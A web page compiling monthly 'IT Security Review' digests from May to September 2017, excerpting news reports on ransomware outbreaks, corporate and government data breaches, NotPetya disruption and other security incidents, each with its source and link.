This page contains articles from various publications. The name of the publication, its date and author of the article will appear under the title along with its online link.

Some publishers track those accessing the articles and may even send a cookies to your device. [Option 1] will be shown where this is likely to occur.






IT SECURITY REVIEW - SEPTEMBER 2017

-----------------------
BRITISH COUNCIL STILL STAGGERING WEEKS AFTER RANSOMWARE BIT ITS PCs
(The Register, dated 29th September 2017 author John Leyden)

Full article [Option 1]:

www.theregister.co.uk/2017/09/29/english_council_ransomware_calamity/

A ransomware assault late last month is continuing to affect the operations of Copeland Borough Council in the northwest of England.

The processing of planning applications is still being affected weeks after a major cyberattack hit the council in rural North West England. The planning application for a housing development of around eight homes in the Cleator Moor area has been held up, according to local reports.

The borough council (CBC) was one of a number of councils to be affected by a cyber ransom attack last month. Problems remain ongoing and it's not clear when they will be resolved.

-----------------------
INTERNET WIDE SECURITY UPDATE PUT ON HOLD OVER FEARS 60 MILLION PEOPLE WOULD BE KICKED OFFLINE
(The Register, dated 28th September 2017 author Kieren McCarthy)

Full article [Option 1]:

www.theregister.co.uk/2017/09/28/internet_update_on_hold/

A multi-year effort to update the internet's overall security has been put on hold just days before it was due to be introduced, over fears that as many as 60 million people could be forced offline.

DNS overseer ICANN announced on Thursday it had postponed the rollout of a new root zone "key signing key" (KSK) used to secure the internet's foundational servers after it received fresh information that indicated its deployment would be more problematic than expected.

The KSK acts as an anchor for the global internet: it builds a chain of trust from the root zone down through the whole domain name system so that DNS resolvers - software that turns addresses like theregister.com into network addresses like 159.100.131.165 - can verify they're getting good valid results to their queries.

Internet engineers knew that introducing a longer and hence more secure public-private key pair would cause some old and poorly configured systems to throw out errors, and so have embarked on a slow rollout that started back in May 2016.

-----------------------
UK CYBER DEFENCES AMONG THE BEST IN EUROPE
(Computer Weekly, dated 25th September 2017 author Warwick Ashford)

Full article [Option 1]:

www.computerweekly.com/news/450426871/UK-cyber-defences-among-the-best-in-Europe

Topping the list of most prepared European Union (EU) nations is the Netherlands, with an overall cyber attack preparedness rating of 60%, according to a report by Website Builder Expert (WBE).

Following the Netherlands is Estonia (58%), France and Italy (57%) and the UK (56%). Conversely, the least prepared nations are Slovakia and Malta (34%), Greece (35%), Spain (38%) and Lithuania (40%).

The overall scores are an average of the cyber security commitment rating and pecentage of protected internet connections for each country.

Estonia has the highest commitment rating of 85%, compared with the UK's 78%, while Italy has the highest percentage of protected internet connections (51%) compared with the UK's (33%).

Although being rated at the most prepared, the Netherlands is second only to Romania in terms of its cyber crime "victimhood" rating of 21%, compared with Romania's 23%. The Netherlands is followed by Portugal (20%), Poland (20%) and Italy (19%).

Countries with the lowest cyber crime "victimhood" ratings are Finland (12%) and Slovakia (14%), along with Germany, Ireland and Austria, which all have a rating of 15%.

-----------------------
DELOITTE HIT BY CYBER-ATTACK REVEALING CLIENTS SECRET EMAILS
(The Guardian, dated 25th September 2017 author Nick Hopkins)

Full article [Option 1]:

www.theguardian.com/business/2017/sep/25/deloitte-hit-by-cyber-attack-revealing-clients-secret-emails

One of the world's "big four" accountancy firms has been targeted by a sophisticated hack that compromised the confidential emails and plans of some of its blue-chip clients, the Guardian can reveal.

Deloitte, which is registered in London and has its global headquarters in New York, was the victim of a cybersecurity attack that went unnoticed for months.

One of the largest private firms in the US, which reported a record $37bn (£27.3bn) revenue last year, Deloitte provides auditing, tax consultancy and high-end cybersecurity advice to some of the world's biggest banks, multinational companies, media enterprises, pharmaceutical firms and government agencies.
Business Today: sign up for a morning shot of financial news
Read more

The Guardian understands Deloitte clients across all of these sectors had material in the company email system that was breached. The companies include household names as well as US government departments.

-----------------------
SINGAPORE SEEN AS TOP SPOT TO LAUNCH GLOBAL CYBER ATTACK
(Bloomberg Technology, dated 22nd September 2017 author Melissa Cheok)

Full article [Option 1]:

www.bloomberg.com/news/articles/2017-09-21/singapore-ranks-first-as-launchpad-for-global-cyber-attacks?cmpId=flipboard

Singapore has overtaken nations including the U.S., Russia and China as the country launching the most cyber attacks globally, according to Israeli data security firm Check Point Software Technologies Ltd.

The company, whose software tracks an average of eight to 10 million live cyber attacks daily, said Singapore rose to pole position after ranking in the top five attacking countries for the previous two weeks.

"It is not particularly unusual for Singapore to be featured among the top attacking countries," said Eying Wee, Check Point's Asia-Pacific spokeswoman.

A key Southeast Asian technology hub, much of the internet traffic flowing through Singapore originates in other countries. That means a cyber attack recorded as coming from Singapore may have been launched outside the country, she said.

-----------------------
HACKERS BROKE INTO SEC COMPUTER SYSTEMS AND MAY HAVE TRADED ON THE STOLEN INFORMATION
(QUARTZ, dated 21st September 2017 author John Detrixhe)

Full article [Option 1]:

https://qz.com/1083640/hackers-broke-into-sec-computer-systems-and-may-have-traded-on-the-stolen-information/

Hackers broke into the systems of the top US securities regulator last year, and may have used confidential information to trade in the stock market. The Securities and Exchange Commission said yesterday that criminals exploited a software vulnerability in its filing system. While the breach was detected in 2016 and the weakness patched, the SEC says it wasn't until last month that the agency realized the information may have been exploited through stock market trades.

It's the second disclosure this month that cyber criminals exploited records entrusted to a key US financial institution. Credit reporting company Equifax said on Sept. 7 that hackers had stolen personal information, such as social Social Security numbers and birth dates, for about half the nation's population. In the SEC hack, the agency says personal data wasn't stolen.

Instead, hackers broke into the SEC's database of filings, called Edgar (Electronic Data Gathering, Analysis and Retrieval system), which houses information from thousands of public companies that are regulated by the agency. Edgar receives and processes more than 1.7 million electronic filings per year. The intruders may have taken advantage of information in the system that hadn't yet been made public.

-----------------------
MORE THAN 80% OF SMALL AND MEDIUM SIZED COMPANIES WERE VICTIMS OF CYBER CRIME
(Irish Examiner, dated 15th September 2017)

Full article [Option 1]:

www.irishexaminer.com/breakingnews/ireland/more-than-80-of-small-and-medium-sized-companies-were-victims-of-cyber-crime-806102.html

A new survey has found more than 80% of small and medium sized companies were victims of cyber crime in the last year.

Around 900 companies responded to the research by the Irish Small and Medium Enterprises Association on how crime affects companies, with one of the main findings being the prevalence of cyber attacks.

The CEO of ISME Neil McDonnell warned smaller businesses to "pay attention".

"What we see is that smaller and smaller businesses are getting affected," he said.

"The message from us is that those companies that thought cyber crime was a matter for banks and big retailers and so on - they need to pay attention. It's happening at very low level now, it's happening with very small companies," Mr McDonnell added.

-----------------------
CYBER CRIME INCIDENTS IN JAPAN HIGHEST SINCE RECORDS BEGAN
(Finance Magnates, dated 7th September 2017 author Colin Firth)

Full article [Option 1]:

www.financemagnates.com/forex/regulation/cyber-crime-incidences-japan-highest-since-records-began/

With more people logging into digital wallets and currencies for payments and investment solution globally, hackers are steadily targeting the system through organised cyber crime. In a report published in the Nikkei Asian Review, in the first six months of 2017 Japan saw a record rise in crime involving digital money and investment scams, with losses amounting to ¥333 million yen ($3.05 million).

The National Police Agency of Japan received total 69,977 reports of cyber crimes in the January-June period, up 4.9% from a year earlier, which is highest since data started being recorded. Losses in digital currency was reported at ¥ 59.2 million ($542,000) -13 cases involving Bitcoin, 11 cases involving Ripple and 2 cases involving Ethereum .

-----------------------
AXA INSURANCE DATA BREACH HITS 5,400 CUSTOMERS IN SINGAPORE
(ZDNET, dated 7th September 2017 author Eileen Yu)

Full article [Option 1]:

www.zdnet.com/article/axa-insurance-data-breach-hits-5400-customers-in-singapore/

AXA Insurance has revealed it suffered a cybersecurity incident that compromised personal data of 5,400 customers in Singapore.

The breach affected users of its health portal including past customers, said its data protection officer, Eric Lelyon, in an e-mail Thursday to affected customers. No other alerts or notices were posted on its website.

Lelyon said the breach "exposed" the customer's e-mail address, date of birth, and mobile number, which was used to transmit one-time passwords (OTPs) when users transacted on the portal.
-----------------------
.UK DOMAINS LEFT AT RISK OF THEFT IN ENOM BLUNDER
(The Register, dated 7th September 2017 author John Leyden)

Full article [Option 1]: www.theregister.co.uk/2017/09/07/enom_security_snafu/

Thousands of UK companies were at risk of having their .uk domain names stolen for more than four months by a critical security failure at domain registrar Enom.

The security lapse allowed .uk domains to be transferred between Enom accounts with no verification, authorisation or logs.

Any domains hijacked would have been "extremely hard or impossible" to recover, according to The M Group, the security firm that discovered the flaw.

The M Group said it reported the issue to Enom on 2 May, but the problem was only addressed on 1 September. The practical upshot of the problem was that anyone with an Enom account would have been able to transfer another Enom customer's domain to their control without consent or authorisation.
-----------------------
SWISS AGENCY REPORTS MAJOR BREACH OF ONLINE CREDENTIALS
(SWI - Swissinfo, dated 29th August 2017)

Full article [Option 1]:

https://www.swissinfo.ch/eng/business/cybercrime_-swiss-agency-reports-major-breach-of-online-credentials/43477546

Around 21,000 passwords and personal details used to access online services have been stolen and could be used illegally, Switzerland's cybercrime monitoring centre has reported.

The Reporting and Analysis Centre for Information Assurance (MELANI) said on Tuesday that a confidential source had sent copies of the stolen data to the cybercrime centre. It had no information on who sent the data or where it had originated, simply declaring that it was in the hands of "unauthorised third parties".

The agency warned that stolen passwords and account details could be used for illegal activities such as fraud, blackmail or phishing.

MELANI has created a website to handle the breach and urges individuals and companies to check whether they are affected.

The agency urges anyone affected to change their password and create a new one for each online service, activate two-step authentication if possible, inform contacts of the hack and check bank details.

The number of cyber-attacks in Switzerland is reportedly on the rise and the problem is expected to get worse - both in terms of volume and complexity of the crimes being committed. Many people and companies are unprepared for the onslaught, experts say.

Last year, 14,033 cybercrime cases were reported to police in Switzerland, compared to 11,575 in 2015 and 5,330 in 2011. A survey from the firm KPMG released in June found that 88% of Swiss companies had experienced cyber-attacks in the past year compared to 54% in 2016.
-----------------------

(1st October 2017)


IT SECURITY REVIEW - AUGUST 2017

-----------------------

NEW LOCKY RANSOMWARE SPAM CAMPAIGN USES "ZOMBIE COMPUTERS" TO SEND OVER 62,000 EMAILS IN JUST 3 DAYS
(International Business Times, dated 31st August 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/new-locky-ransomware-spam-campaign-uses-zombie-computers-send-over-62000-emails-just-3-days-1637385

A new variant of the proliferate Locky ransomware, dubbed IKARUSdilapidated, was found conducting a fresh, massive spam campaign earlier in August. Locky's new variant used "zombie computers" to send out over 62,000 spam emails in just three days in the first stage of the attack. The cybercriminals operating Locky's new variant demanded victims pay between 0.5 ($2,311, £1,791) and 1 bitcoin ($4,623, £3,583) to get back access to their encrypted files.

Although the campaign targets "tens of thousands" of victims across the globe, the top five countries targeted by the campaign include Vietnam, India, Mexico, Turkey, and Indonesia.

-----------------------
CeX HACK - 2 MILLION CUSTOMERS' PERSONAL DATA COMPROMISED
(International Business Times, dated 30th August 2017 author Hyacinth Mascarenhas)

Full article [Option 1]:

www.ibtimes.co.uk/cex-hack-2-million-customers-personal-data-compromised-massive-security-breach-1637174
Second-hand electronics retailer CeX said on Tuesday (29 August) it suffered a massive "online security breach" compromising the personal data and passwords of up to two million customers. The UK retailer said customers' names, physical addresses, email addresses and phone numbers were compromised in the attack that saw "an unauthorised third party" illegally access its computer systems.
-----------------------

CYBER ATTACK ALERT WEEKS BEFORE US WARSHIP CRASHED
(The Times, dated 27th August 2017 author Richard Kerbaj)

Full article [Option 1] :

www.thetimes.co.uk/article/cyber-attack-alert-weeks-before-uss-john-s-mccain-warship-crashed-3660dfsrr

Ship owners were warned about the threat of cyber-attacks only weeks before America began investigating the "possibility" that hackers caused the collision between one of its warships and an oil tanker, The Sunday Times can reveal.

The International Maritime Organisation (IMO), a London-based UN-affiliated body that regulates shipping, last month published guidelines urging ship owners to safeguard vessels against the "current and emerging threats" of cyber-hacking.

This weekend Lord West, a former admiral in the Royal Navy, also raised concerns about cyber-attacks, saying he was worried by merchant vessels' vulnerability.

The revelation follows the collision between the American destroyer USS John S McCain and a Liberian oil tanker, Alnic MC, in the South China Sea last week, leaving 10 US sailors dead or missing.

The route of the tanker taken from tracking signals and posted online by the VesselFinder website, shows it making a sudden turn to port just before the collision. Military intelligence officials fear the tanker may have been sent off course by a remote attack on its navigation systems.

-----------------------

SOMEONE HAS PUBLISHED A LIST OF TELNET CREDENTIALS FOR THOUSANDS OF IoT DEVICES
(Bleepingcomputer, dated 26th August 2017 author Catalin Cimpanu)

Full article [Option 1]:

www.bleepingcomputer.com/news/security/someone-published-a-list-of-telnet-credentials-for-thousands-of-iot-devices/

A list of thousands of fully working Telnet credentials has been sitting online on Pastebin since June 11, credentials that can be used by botnet herders to increase the size of their DDoS cannons.

The list - spotted by Ankit Anubhav, a security researcher with New Sky Security - includes an IP address, device username, and a password, and is mainly made up of default device credentials in the form of "admin:admin", "root:root", and other formats. The Pastebin list includes 143 credential combos, including the 60 admin-password combos from the Mirai Telnet scanner.

There are 33,138 entries on the list...
-----------------------

POINT OF SALES HACK - VULNERABILITY LETS HACKERS BUY ANYTHING FOR $1
(International Business Times, dated 25th August 2017 author AJ Dellinger)

Full article [Option 1]:

http://www.ibtimes.com/point-sales-hack-vulnerability-lets-hackers-buy-anything-1-2582878

A vulnerability discovered by security researchers in a popular point of sales system allows attackers to steal credit card and payment information, alter vital files within the system and change the prices for any item.

Researchers at cybersecurity firm ERPScan first discovered the vulnerability, which affects the SAP POS Xpress Server and SAP point-of-sale clients, the system customers interact with when they pay a retailer.

"Enterprises struggle with managing risk from third-party unmanaged assets on their network that are vulnerable, such as PoS systems. These devices are a part of critical business processes and have a significant breach impact," Gaurav Banga, the founder and CEO of Balbix, a firm that specializes in data breach resistance, told International Business Times.

-----------------------
TALKTALK FINED BY UK DATA BREACH WATCHDOG
(International Business Times, dated 10th August 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/talktalk-fined-100000-by-uk-data-breach-watchdog-2014-cybersecurity-scare-1634488

TalkTalk has been hit with a £100,000 fine for failing to protect its customers' information in relation to a third-party data incident back in 2014, the UK's Information Commissioner's Office (ICO) announced on Thursday (10 August).

A probe concluded that TalkTalk had breached the Data Protection Act because it let company employees have access to "large quantities of customers' data" without having adequate security protections in place to ensure it wasn't abused by rouge members of staff.

-----------------------
HBO HACKERS LEAK SCRIPT OF UPCOMING GAME OF THRONES EPISODES AND TOP BOSSES' EMAILS
(International Business Times, dated 8th August 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/hbo-hackers-leak-script-upcoming-game-thrones-episode-top-bosses-emails-1633970

The unknown hacker(s) behind the recent HBO data breach have reportedly leaked the summary of the script of an upcoming Game Of Thrones episode, as well as a month's worth of emails from HBO's top executives.

The hackers also are said to have sent a video message to HBO CEO Richard Plepler, demanding an undisclosed amount of money as ransom. The attackers allegedly claimed that HBO was their 17th target and one of the most challenging ones to breach.

See also : www.ibtimes.co.uk/hbo-hack-here-are-some-expert-theories-how-why-it-happened-1633657

-----------------------
UKRAINE'S NATIONAL POSTAL SERVICE NETWORKS DISRUPTED BY TWO-DAY DDoS CYBERATTACKS
(International Business Times, dated 8th August 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/ukraines-national-postal-service-networks-disrupted-by-two-day-ddos-cyberattack-1634132

The computer networks of Ukrposhta, the national postal service in Ukraine, have reportedly been disrupted by a two-day distributed-denial-of-service (DDoS) cyberattack.

According to the Interfax news agency, the computer systems targeted by the unknown hackers are linked to the tracking of customer parcels. It is believed that the attack started on the morning of Monday 7 August and, despite a brief period of respite, continued into the next day.

-----------------------

(28th September 2017)

IT SECURITY REVIEW - JULY 2017

------------------------
LONDON COPS BUST FAKE CISCO HARDWARE CHAIN
(The Register, dated 28th July 2017 author Paul Kunert)

Full article [Option 1]: www.theregister.co.uk/2017/07/28/london_cops_bust_fake_cisco_hardware_chain/

City of London cops today confirmed they have confiscated hundreds of thousands of pounds worth of counterfeit Cisco networking gear.

Officers from the Intellectual Property Crime Unit (PIPCU) raided a premise in Herne Bay, Kent on 25 July and discovered more than 1,000 counterfeit items of networking kit.

Several individuals were held and interviewed under caution as the probe continues, the police stated.

"The success of this operation has stopped organisations and companies from potential harm, should they have bought and used the counterfeit items," said PIPCU Detective Sergant Kevin Ives.

Cisco - it is not alone - has long battled counterfeiters, the problem sometimes stems from midnight runs; at the end of a working day, scammers reset serial numbers and throughout the night produce parts or finished systems using the same digits.
------------------------
VIRGIN AMERICA WORKERS RESET PASSWORDS AFTER HACKERS ATTACK
(The Register, dated 28th July 2017 authors Shaun Nichols and John Leyden)

Full article [Option 1]: www.theregister.co.uk/2017/07/28/virgin_america_hacked/

Virgin America's staff and contractors have been told to change their passwords after a hacker raided the airline's systems.

The T-Mobile-USA-of-the-skies revealed in a letter to its workforce that its network was compromised by one or more miscreants. A copy of the missive was, as required by law, shared with California's employment officials, who made it public this week. The intrusion was detected in mid-March.

According to the memo, the hacker swiped login information and passwords used to access Virgin America's corporate network. Some 3,120 employees and contractors had their credentials lifted, and 110 folks may have had their personal information taken, too. Alaska Airlines, which owns Virgin America, is not affected.

------------------------
CYBER ARM OF UK SPY AGANCY LEFT WITHOUT ENCRYPTION FOR FOUR MONTHS
(The Register, dated 24th July 2017 author Kat Hall)

Full article [Option 1]:

www.theregister.co.uk/2017/07/24/spooks_agency_cesg_left_without_pgp_for_four_months/

UK spy agency GCHQ's cyber security arm, CESG, was left without PGP encryption for more than four months, according to a government report.

This "prevent[ed] direct electronic receipt of evaluation reports", it emerged in the Huawei Cyber Security Evaluation Centre (HCSEC) Oversight Board (PDF) annual report.

"Internal processes were updated to ensure this issue does not recur," said the report.

Meanwhile the report, intended to assess the perceived risks arising from the involvement of Huawei in parts of the UK's critical national infrastructure, once again gave the Chinese kit-maker the green light.

Any risks to UK national security from Huawei's involvement in the UK's critical networks have been sufficiently mitigated, found the third annual probe from the HCSEC Oversight Board.

------------------------
MORE THAN HALF OF COMPANIES IN GERMANY HIT BY SPYING, SABOTAGE OR DATA THEFT IN PAST TWO YEARS
(International Business Times, dated 22nd July 2017 author Hyacinth Mascarenhas)

Full article [Option 1]:

www.ibtimes.co.uk/more-half-companies-germany-hit-by-spying-sabotage-data-theft-past-two-years-1631447

More than half the companies in Germany have been victims of sabotage, industrial espionage or data theft in the past two years, German IT industry association Bitkom said on Friday (21 July). About 53% of companies in Germany have been hit with such attacks, up from 51% in a 2015 study, costing an estimated €55bn (£49.35bn, $64.13bn) worth of damage per year.

German firms also lost millions of euros to organised crime in a scam dubbed "CEO Fraud".
Why advertise with us

According to the survey of 1,069 managers and people responsible for the industry, the damage caused by these attacks also rose by about 8% - up from €51bn a year in 2015.

------------------------
LARGEST ADVERTISING COMPANY IN THE WORLD STILL WINCING AFTER NOTPETYA PUNCH
(The Register, dated 7th July 2017 author Kat Hall)

Full article [Option ]: www.theregister.co.uk/2017/07/07/ad_giant_recovering_from_notpetya/

The huge cyber attack that swept from Ukraine last week is still affecting companies, and several have been hit pretty hard, including the world's largest advertising business, UK-based WPP.

The malware attack, dubbed NotPetya because it masquerades as the Petya ransomware, affected several multinationals running Microsoft Windows. Most, if not all, confirmed cases stemmed from a malicious update to MeDoc, Ukraine's most popular accounting software.

One week after the attack and a number of WPP's agencies are still locked out of their network, with some staff only able to access webmail. It is not alone: Maersk, AP Moller-Maersm, Reckitt Benckiser and FedEx are also struggling to get back on their feet. It has prompted analysts to wonder why some were more susceptible than others.

WPP said it is "making steady progress towards resuming normal operations in parts of the Group that continue to experience some disruption". It said systems have been brought back online "in a measured and prudent way, again in line with good practice".

-----------------------
HARD ROCK, LOEWS HOTELS AMONG SABRE CORP HOSPITALITY BREACH VICTIMS
(Kaspersky Labs / Threat Post, dated 7th July 2017 author Chris Brooks)

Full article [Option 1]:

https://threatpost.com/hard-rock-loews-hotels-among-sabre-corp-hospitality-breach-victims/126715/

For the second time in the past year the Hard Rock Hotels and Casinos franchise is encouraging guests to keep tabs on their bank account statements for suspicious activity.

The hotel, resort, and casino chain on Thursday said it was alerted on June 6 that its systems were impacted by a security incident involving Sabre Hospitality Solutions (SHS) SynXis, an inventory management SaaS application.

According to a press release on Thursday, 11 Hard Rock properties, including the Hard Rock Hotel and Casino Las Vegas and the Hard Rock Hotel Cancun, were affected by the Sabre breach. As part of the breach, the chain claims an attacker gained access to SynXis account credentials, something which gave them access to unencrypted payment card information and a number of reservations processed via the reservation system.

It was around this time last summer that the Hard Rock Hotel and Casino in Las Vegas began notifying guests and patrons that restaurants and retail outlets there had been hit by a breach. Customers who made purchases between October 27, 2015 and March 21, 2016 were hit by card scraping malware that may have accessed their name, credit card number, expiration date and 3-digit internal verification code.

-----------------------
RECKETT BENCKISER WARNS OF PERMANENT SALES HIT FROM CYBER ATTACK
(BBC News, dated 6th July 2017)

Full article : www.bbc.co.uk/news/business-40517105

Household products giant Reckitt Benckiser has said last month's malware cyber-attack could lead to a permanent loss of revenue.

The attack disrupted manufacturing and ordering systems at the company, whose products include Nurofen and Dettol.

Although it had "largely contained" the attack, Reckitt said the disruption meant like-for-like revenue growth in the second quarter would be down 2%.

It also said it expected to lose "some further revenue permanently".

The cyber-attack, thought to have begun in Ukraine, spread across 60 countries. It is still not clear what caused it and nor are the reasons for the attack known.

Although ransom money was demanded by the attackers, some experts think the motive may not have been money but access to data, possibly to destroy it rather than use the information for other purposes.

See also [Option 1] :

www.theguardian.com/business/2017/jul/06/cyber-attack-nurofen-durex-reckitt-benckiser-petya-ransomware

------------------------
MAERSK BRINGS MAJOR IT SYSTEMS BACK ONLINE AFTER CYBER ATTACK
(Reuters, dated 3rd July 2017 author "Staff")

Full article [Option 1]:

https://uk.reuters.com/article/us-cyber-attack-maersk-idUKKBN19O0X8

Danish shipping giant A.P. Moller-Maersk (MAERSKb.CO) said it had restored its major applications, as it brings its IT systems back online after being hit by a major cyber attack last week.

"Today we can finally reopen our key applications," Maersk said in a statement on Monday.

The company, which handles one in seven containers shipped globally, said it expects to have all its 1500 applications fully functional within a week.

Maersk said on Friday it expected client-facing operations to return to normal by Monday and was resuming container deliveries at its major ports.
------------------------

(21st September 2017)


IT SECURITY REVIEW - JUNE 2017

-----------------------
HAS "FIREBALL" MALWARE INFECTED 250 MILLION COMPUTERS ? MICROSOFT DISPUTES SHOCKING CLAIM
(International Business Times, dated 22nd June 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/has-fireball-malware-infected-250-million-computers-microsoft-disputes-shocking-claim-1627444

On 1 June, cybersecurity firm Check Point warned a strain of malware dubbed "Fireball" had infected more than 250 million Windows computers across the world and had the power to "initiate a global catastrophe." This week (22 June), Microsoft publicly disputed the findings.

Fireball could seemingly take control of web browsers, spy on internet activities and steal personal files. Check Point claimed the operation was linked to a Chinese firm called Rafotech that was allegedly using it to manipulate search engines and scoop up users' private information.

uaware full article summary........but it may only be 5 million infected computers !

-----------------------
UCL RANSOMWARE ATTACK TRACED TO MALVERTISING CAMPAIGN
(The Register, dated 22nd June 2017 author John Leyden)

Full article [Option 1]:

www.theregister.co.uk/2017/06/22/ucl_ransomware_malvertising/

Security researchers have suggested that the ransomware attack on University College London last week was spread through a "malvertising" campaign.

Proofpoint reckons the AdGholas group spread the infection using malware-tainted online ads. This was a "zero-click required" campaign that could infect users who simply visited a compromised site1.

More specifically, the Astrum Exploit Kit was used to deliver the Mole ransomware, Proofpoint said. Mole is a member of the CryptFile2/CryptoMix ransomware family.

On June 15, 2017, several universities in the UK including UCL and Ulster reported that they were victims of a "zero-day" ransomware attack. This was unrelated to a separate spam campaign spreading the Dridex banking trojan, Proofpoint said.

-----------------------
UNIVERSITY COLLEGE LONDON FIGHTS OFF RANSOMWARE INFECTION
(SC Media, dated 15th June 2017)

Full article [Option 1]:

www.scmagazine.com/update-university-college-london-fights-off-ransomware-infection/article/668720/

University College London (UCL) is in the grip of a ransomware attack, according to its information security team.

The malware made its way onto the university's network on June 14 through a phishing email and started to spread, infecting user accounts and shared drives. The university's systems were not alerted to any viruses or suspicious activity, suggesting that this could be a zero-day attack.

The information security team disabled a number of drives to try and stem the spread of the malware and, the department declared, "UCL's information Security team is actively working with the affected users to identify the source of the infection and to quarantine their machines and file-stores."

The affected drives have since been made read-only and some system storage has been taken offline.

As of 8 am, the department said, "UCL continues to be subject to a cyber-attack although we have taken action to stop the spread of the malware."

-----------------------
PEOPLE IN THE US ARE LESS SAVVY ABOUT CYBERSECURITY THAN PEOPLE IN THE UK
(BetaNews, dated 13th June 2017 author Mark Wilson)

Full article [Option 1]:

https://betanews.com/2017/06/13/us-uk-cyber-security/

A new report suggests that people in the UK are more aware of the terminology surrounding cyber security, and are less likely to fall victim to hacking and identity theft. Wombat Security Technologies' 2017 edition of its User Risk Report reveals a stark difference in cyber knowledge on either side of the Atlantic.

The report is based on a survey carried out last month into knowledge of, and attitudes to, cyber security topics and best practices. While the report shows that the UK is generally more cyber security savvy, the US is shown to fare better when it comes to passwords and backing up data.

-----------------------
BUG IN VIRGIN MEDIA SUPER HUB ROUTERS LEFT DEVICES OPEN TO HACKING
(International Business Times, dated 12th June 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/bug-virgin-media-super-hub-routers-left-devices-open-hacking-are-you-risk-1625846

A vulnerability in Virgin Media's wireless home internet routers could, until recently, give hackers the ability to gain complete control over the software and potentially monitor web traffic flowing through the network from connected PCs, smartphones and tablet.

That's according to researchers from Context, a cybersecurity firm, who reverse engineered software from two popular Netgear-made routers - the Super Hub 2 and Super Hub 2AC - and discovered a bug in the 'custom backup configuration' feature left devices open to attack.
-----------------------

-----------------------
EU EXPLORES WAYS TO EXPIDITE POLICE REQUESTS FROM TECH FIRMS IN WAKE OF TERRORIST ATTACKS
(Venturebeat.com, dated 8th June 2017 author Rueters)

Full article [Option 1]:

https://venturebeat.com/2017/06/08/eu-explores-ways-to-expedite-police-data-requests-from-tech-firms/

The European Union wants to make it easier for law enforcement authorities to get electronic evidence directly from tech companies, such as Facebook and Alphabet's Google, even when stored in another European country.

In the wake of the deadly Islamist-inspired attacks in Europe over the past two years, tech companies have come under increased pressure to do more to help police investigations, and law enforcement officials have bemoaned the slow process required to access data stored in the cloud in other EU member states.

The European Commission will present three options to EU ministers which will form the basis of a future legislative proposal, including the possibility for police to copy data directly from the cloud, EU Justice Commissioner Vera Jourova told Reuters on Wednesday.

-----------------------
CYBERCRIME IS SKYROCKETING IN SWITZERLAND
(Swissinfo, dated 1st June 2017 author Matthew Allen)

Full article [Option 1]:

www.swissinfo.ch/eng/business/theft--extortion--blackmail_cybercrime-is-skyrocketing-in-switzerland/43226430

The number of cyber-attacks in Switzerland is on the rise and the problem is expected to get worse - both in terms of volume and complexity of the crimes being committed. Many people and companies are unprepared for the onslaught, experts say.

Last year, 14,033 cybercrime cases were reported to police in Switzerland, compared to 11,575 in 2015 and 5,330 in 2011. A survey from the firm KPMGexternal link released this week found that 88% of Swiss companies have experienced cyber-attacks in the past year compared to 54% in 2016.

----------------------
FIREBALL MALWARE COULD SPARK GLOBAL CATASTROPHE AFTR INFECTING 250 MILLION COMPUTERS
(International Business Times, dated 1st June 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/fireball-malware-could-spark-global-catastrophe-after-infecting-250-million-computers-already-1624286

A massive malware campaign that has the power to "initiate a global catastrophe" has currently infected more than 250 million computers worldwide. The software, dubbed "Fireball", can take control of internet browsers, spy on victim's web use and potentially steal personal files.

According to Check Point, a cybersecurity firm, the operation is linked to Rafotech, a Chinese firm claiming to provide digital marketing and game apps to 300 million customers. It is allegedly using Fireball to manipulate victim's browsers, change search engines, and scoop up user data.

But experts warn the malware has the potential to cause a major cybersecurity incident worldwide.

-----------------------

(1st September 2017)


IT SECURITY REVIEW - MAY 2017

-----------------------
BA "GLOBAL IT SYSTEM FAILURE" IS DUE TO "POWER SUPPLY ISSUES"
(The Register, dated 27th May 2017 author "Register Reporter)

Full article [Option 1]:

www.theregister.co.uk/2017/05/27/ba_it_systems_failure_down_to_power_supply_issue/

British Airways CEO Alex Cruz has said the root cause of today's London flight-grounding IT systems ambi-cockup is "a power supply issue" and that the airline has "no evidence of any cyberattack".

The airline has cancelled all flights from London's Heathrow and Gatwick amid what BA has confirmed to The Register is a "global IT system failure".

BA has a very large IT infrastructure; it has over 500 data cabinets spread across six halls in two different sites near its Heathrow Waterside HQ.

BA has not specified where the power issues occurred and we have asked them about this.

The airline's IT teams are working "tirelessly" to fix the problems, said Cruz.

This time last year, BA tech union reps were pleading with the Home Office airline not to outsource IT jobs to Tata Consultancy Services in India.

-----------------------
SAINSBURY'S IT GLITCH SPOILS BANK HOLIDAY FOOD ORDERS
(The Register, dated 26th May 2017 author Kat Hall)

Full article [Option 1]:

www.theregister.co.uk/2017/05/26/sainsburys_it_glitch_ruins_bank_holiday_food_orders/

The sun is shining and the prospect of barbecue and beer over the bank holiday is almost in grabbing distance. But customers who ordered their groceries online with Sainsbury's today may be in for a disappointment.

Due to "technical issues", a number of online deliveries have been missed.

One insider got in touch with The Register to report that all Sainbury's Groceries Online fulfilments were this morning being carried out via printouts rather than scanners, with shops having to run orders through tills manually.

That led to some major delays, with departure times for vans being missed. "People aren't going to be getting deliveries or will miss them because of the delays. This is affecting multiple if not all GOL [Groceries Online] stores," said the insider.

A Sainsbury's spokeswoman said that an earlier technical error means some customers' orders are being rebooked.

-----------------------
MAJOR INCIDENT AT CAPITA DATA CENTRE : MULTIPLE SERVICES STILL KNACKERED
(The Register, dated 26th May 2017 author Kat Hall)

Full article [Option 1]:

www.theregister.co.uk/2017/05/26/major_incident_at_capita_data_centre/

A major outage at a Capita data centre has knocked out multiple services for customers - including a number of councils' online services - for the last 36 hours.

Some of the sites affected include the NHS Business Services Authority, which apologised on its website for the continuing disruption and said it hoped its systems would be available by noon on Friday.

Sheffield City Council said on its website: "We're aware an off-site power failure is causing problems for customers trying to contact us".

The issues first emerged at 22:30 on Wednesday, affecting Capita Pay360 customers. The outsourcer said that was due to a major incident at our data centre.

However, the impact appears to be much wider. One customer who asked not to be named said: "According to rumour, there was a power failure in West Malling and the generators failed, shutting the whole data centre down."

-----------------------
SAMSUNG S8 "EYE SECURITY" FOOLED BY PHOTO
(BBC News, dated 23rd May 2017)

Full article : www.bbc.co.uk/news/technology-40012990

